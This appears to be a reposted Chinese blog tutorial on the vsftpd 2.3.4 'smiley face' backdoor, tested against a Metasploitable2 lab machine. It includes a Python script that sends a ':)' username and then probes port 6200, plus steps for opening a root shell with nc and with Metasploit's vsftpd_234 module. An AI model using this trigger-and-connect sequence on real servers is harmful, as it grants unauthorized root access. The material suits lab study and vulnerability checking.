python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

简介: vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。

本文转载:https://xiaochuhe.blog.csdn.net/article/details/122693486?spm=1001.2014.3001.5502
一、漏洞介绍
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
二、环境搭建

攻击机(本机):192.168.1.3

靶机(metaspolit2):192.168.1.5

三、nmap进行漏洞检测

图片.png
图片.png

四、python脚本进行漏洞检测
代码如下:

import socket
from ftplib import FTP
 
url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)' #用户名必须包含:)这两个字符
password = 'anonymous' #密码随便啥都行
try:
    ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒
    ftp.login(username,password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket() #使用socket函数来检测是否有漏洞存在
    s.connect((url,6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("没有发现笑脸漏洞!")

输出结果:
图片.png

五、漏洞复现
(一)使用nc进行漏洞利用
1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个密码回车等待,紧接着进行下一步:
图片.png

2、打开一个新窗口,输入nc 目标ip 6200 即可连接。
图片.png

(二)使用msf进行漏洞利用
1.打开MSFConsole搜索vsftpd_234并使用
图片.png

  1. 设置攻击目标,进行exploit即可获取shell。

图片.png

相关文章
|
2月前
|
机器学习/深度学习 TensorFlow 算法框架/工具
使用Python实现深度学习模型:智能质量检测与控制
使用Python实现深度学习模型:智能质量检测与控制 【10月更文挑战第8天】
260 62
使用Python实现深度学习模型:智能质量检测与控制
|
1月前
|
机器学习/深度学习 PyTorch TensorFlow
使用Python实现智能食品质量检测的深度学习模型
使用Python实现智能食品质量检测的深度学习模型
124 1
|
2月前
|
网络安全 Python
Python编程--目标IP地址段主机指定端口状态扫描
Python编程--目标IP地址段主机指定端口状态扫描
63 1
|
3月前
|
Docker Python 容器
python检测docker compose文件是否正确
python检测docker compose文件是否正确
|
3月前
|
机器学习/深度学习 数据采集 网络安全
使用Python实现深度学习模型:智能网络安全威胁检测
使用Python实现深度学习模型:智能网络安全威胁检测
300 5
|
3月前
|
编解码 Python Windows
python有没有包 可以检测 这个视频是否可以播放
python有没有包 可以检测 这个视频是否可以播放
|
2月前
|
运维 安全 网络协议
Python 网络编程:端口检测与IP解析
本文介绍了使用Python进行网络编程的两个重要技能:检查端口状态和根据IP地址解析主机名。通过`socket`库实现端口扫描和主机名解析的功能,并提供了详细的示例代码。文章最后还展示了如何整合这两部分代码,实现一个简单的命令行端口扫描器,适用于网络故障排查和安全审计。
54 0
|
2月前
|
数据处理 Python
Python读取大文件的“坑“与内存占用检测
Python读取大文件的“坑“与内存占用检测
70 0
|
2月前
|
安全 Java Python
基于python-django的Java网站全站漏洞检测系统
基于python-django的Java网站全站漏洞检测系统
36 0
|
2月前
|
存储 数据安全/隐私保护 Python
Python编程--使用Ftplib破解FTP用户口令的方法
Python编程--使用Ftplib暴力破解FTP用户口令
23 0